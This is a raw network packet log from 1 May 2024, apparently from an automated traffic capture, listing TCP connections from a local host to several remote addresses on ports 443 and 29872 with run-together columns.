                                              May 1, 2024 18:22:20.932365894 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.932380915 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.932399988 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.932399988 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.932420969 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.933231115 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.933278084 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.933288097 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.933326960 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.934181929 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.934228897 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.934235096 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.934247971 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.934274912 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.934812069 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.934850931 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:20.934873104 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:20.934910059 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.023267984 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.023350000 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.023382902 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.023421049 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.023435116 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.023435116 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.023464918 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.023474932 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.023497105 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.023526907 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.024305105 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.024352074 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.024362087 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.024409056 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.024415016 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.024426937 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.024458885 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.025440931 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.025490999 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.025499105 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.025510073 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.025535107 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.025547028 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.026293993 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.026349068 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.026803970 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.026859999 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.026927948 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.026968002 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.027821064 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.027873993 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.027879000 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.027889967 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.027924061 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.027936935 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.027940035 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.027951956 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.027986050 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.028850079 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.028904915 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.028909922 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.028922081 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.028954029 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.029776096 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.029822111 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.030534983 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.030581951 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.030637026 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.030678034 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.030682087 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.030693054 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.030724049 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.031655073 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.031701088 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.031728029 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.031749964 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.031764030 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.031795025 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.032552004 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.032613039 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.034396887 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.034408092 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.034447908 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.034462929 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.034473896 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.034492970 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.034512043 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.035403967 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.035435915 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.035466909 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.035489082 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.035501957 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.035537004 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.037353039 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.037399054 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.037415981 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.037439108 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.037458897 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.037482023 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.039237022 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.039280891 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.039295912 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.039311886 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.039328098 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.039355993 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.041147947 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.041203976 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.049983978 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.050000906 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.050019979 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.050069094 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.050075054 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.050091982 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.050112009 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.050132990 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.053211927 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.117778063 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.117839098 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.117970943 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.117970943 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.118000031 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.118041039 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.119381905 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.119740009 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.119786978 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.119792938 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.119805098 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.119832993 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.119843960 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.119975090 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.121633053 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.121684074 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.121701956 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.121721983 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.121732950 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.121758938 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.121998072 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.122957945 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.123003006 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.123011112 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.123020887 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.123044968 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.123064041 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.123182058 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.124871016 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.124922991 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.124927998 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.124938965 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.124963999 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.124978065 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.125099897 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.126925945 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.126974106 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.126981974 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.126995087 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.127018929 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.127037048 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.127146006 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.128772020 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.128818035 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.128838062 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.128863096 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.128875971 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.128875971 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.128902912 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.128998995 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.129897118 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.129942894 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.129954100 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.129960060 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.129987955 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.130001068 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.130084991 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.131791115 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.131836891 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.131848097 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.131854057 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.131882906 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.131892920 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.131983042 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.133903027 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.133948088 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.133961916 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.133968115 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.133994102 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134011030 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134082079 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.134126902 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134133101 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.134152889 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:21.134167910 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134188890 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134885073 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134885073 CEST49204443192.168.2.22172.67.191.112
                                              May 1, 2024 18:22:21.134902954 CEST44349204172.67.191.112192.168.2.22
                                              May 1, 2024 18:22:27.581115007 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:27.581177950 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:27.581223965 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:27.627274990 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:27.627310038 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:27.829137087 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:27.829199076 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:27.836903095 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:27.836956978 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:27.837248087 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:27.837321043 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:28.654484987 CEST4920629872192.168.2.22192.169.69.26
                                              May 1, 2024 18:22:28.862302065 CEST2987249206192.169.69.26192.168.2.22
                                              May 1, 2024 18:22:28.862358093 CEST4920629872192.168.2.22192.169.69.26
                                              May 1, 2024 18:22:28.866365910 CEST4920629872192.168.2.22192.169.69.26
                                              May 1, 2024 18:22:29.095829964 CEST2987249206192.169.69.26192.168.2.22
                                              May 1, 2024 18:22:29.363814116 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.408122063 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476682901 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476738930 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476766109 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476804972 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476811886 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476845980 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476850986 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476882935 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476888895 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476919889 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476926088 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476960897 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476965904 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.476999044 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.476999998 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477016926 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477036953 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477051973 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477382898 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477420092 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477431059 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477464914 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477498055 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477533102 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477540016 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477579117 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477586985 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477621078 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.477627993 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.477663040 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478316069 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478317022 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478353977 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478437901 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478475094 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478482962 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478518963 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478538990 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478574038 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478596926 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478635073 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.478641987 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.478677988 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479231119 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479274035 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479367018 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479401112 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479410887 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479444981 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479466915 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479504108 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479511023 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479545116 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479552984 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479588032 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.479595900 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.479629993 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.480273008 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480313063 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.480321884 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480357885 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.480362892 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480398893 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.480403900 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480438948 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.480443954 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480453968 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.480480909 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481316090 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481354952 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481369972 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481404066 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481410980 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481445074 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481456995 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481489897 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481498957 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481534958 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481550932 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481584072 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.481590986 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.481627941 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.482264996 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.482304096 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.482320070 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.482362032 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.571917057 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.571990013 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.572228909 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.572268009 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.572830915 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.572875023 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.572889090 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.572932959 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.573532104 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.573580027 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.573590994 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.573631048 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.573645115 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.573684931 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.573780060 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.574421883 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.574472904 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.574485064 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.574527979 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.575445890 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.575493097 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.575942993 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.575985909 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.576073885 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.576112986 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.576948881 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.576988935 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.577008963 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.577052116 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.577938080 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.577987909 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.578008890 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.578047037 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.622684956 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.622741938 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.622750044 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.622777939 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.622793913 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.622811079 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.666213036 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.666338921 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.666419029 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.666470051 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.666568041 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.666613102 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.667124987 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.667443037 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.667488098 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.667515993 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.667555094 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.667562008 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.667603016 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.667776108 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.668467999 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.668520927 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.668525934 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.668544054 CEST44349205104.21.60.38192.168.2.22
                                              May 1, 2024 18:22:29.668565035 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.668576956 CEST49205443192.168.2.22104.21.60.38
                                              May 1, 2024 18:22:29.669322014 CEST44349205104.21.60.38192.168.2.22
